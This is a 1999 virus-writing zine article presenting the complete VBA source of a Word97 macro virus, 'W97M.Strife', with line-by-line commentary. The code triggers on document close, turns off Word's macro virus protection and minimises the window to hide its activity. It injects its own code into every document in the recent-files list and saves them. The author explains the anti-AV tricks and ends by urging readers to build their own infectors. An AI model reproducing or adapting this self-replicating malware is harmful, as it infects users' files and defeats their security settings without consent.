<-------------------------//LineZer0 Network 99\\------------------------->
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=


~Word97ClassMacro.Strife~
=========================

Identification:
~~~~~~~~~~~~~~~

	~Virusname: 	W97M.Strife
	~Size:		28.160 Bytes (1 Classobject)
	~Version:	A
	~Origin:  	Austria
	~Author:	jack twoflower / [LineZer0 & Metaphase]
	~Date:		May, 1999

Features:
~~~~~~~

	~Application	Word97
	~Payload: 	Yes, just a messagebox
	~Stealth: 	Nope
	~Retro: 	Nope
	~SR-1 comp.: 	Yes
	~Polymorph:	Nope
	~Encrypted: 	Nope
	~Special:	Document-only infector


    This macro 'Strife' represents some ideas of me concerning a document-
only infector. It gets activate when you close document or Word and infects
all the documents in the recent files list. Due it's a class infector it's
also unscannable by F/Win 1.82 and fast! Ok, take a look at the code now...


> This is a comment...
----------------------------[code starts here]-----------------------------

Sub Document_Close()

> Activate at closing...

Application.WindowState = wdWindowStateMinimize

> Minimize Word. This here is important so that the user won't notice
> anything of the infection...

Set a = MacroContainer.VBProject: Options.VirusProtection = False
Set ab = a.vbcomponents(1): Set abc = ab.codemodule

> Set the variables not in the common way, to confuse AV!!!

For i = 1 To RecentFiles.Maximum

> Build a loop from 1 to the maximum recent files...

RecentFiles(i).Open

> Open the recent file for infection...

Dn = RecentFiles(1).Name

> Set the name of the opened document into the string 'Dn'...
> Here it's important to use recent file '1', because if we
> use here 'i' we would try to infect the already infected doc.
> I will explain this: We close an infected document, so it is
> a the first position in the recentfiles. The infected document
> opens now the for example recentfile nr. 2. The already infected
> document gets now recent file nr.2 and the just openend document
> for infecting becomes nr.1. so we must use here the '1'!

Set s = Documents(Dn): Set nh = s.VBProject.vbcomponents(1).codemodule

> Set again objects...

If nh.countoflines < 5 Then

> Count the lines, if less then five infect...

nh.addfromstring abc.lines(1, abc.countoflines)

> Add here the sourcecode...

s.Save

> Save the new infected document...

End If
Next

> 'Play it again Sam' or go back to the next recentfile...

If Day(Now()) = Int(Rnd * 31) + 1 Then MsgBox "øStrife?", 64

> Show some little messagebox... 

Application.Quit

> Close now Word...

End Sub

Rem Another macro virus by Jack Twoflower LineZerÿ/Metaphase

-------------------------------[code ends here]----------------------------

    So this was a little document-only infector. Try to improve this here
and make your own doc infector, it isn't hard...

Keep VXing,						     jack twoflower

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=
<-------------------------\\LineZer0 Network 99//------------------------->
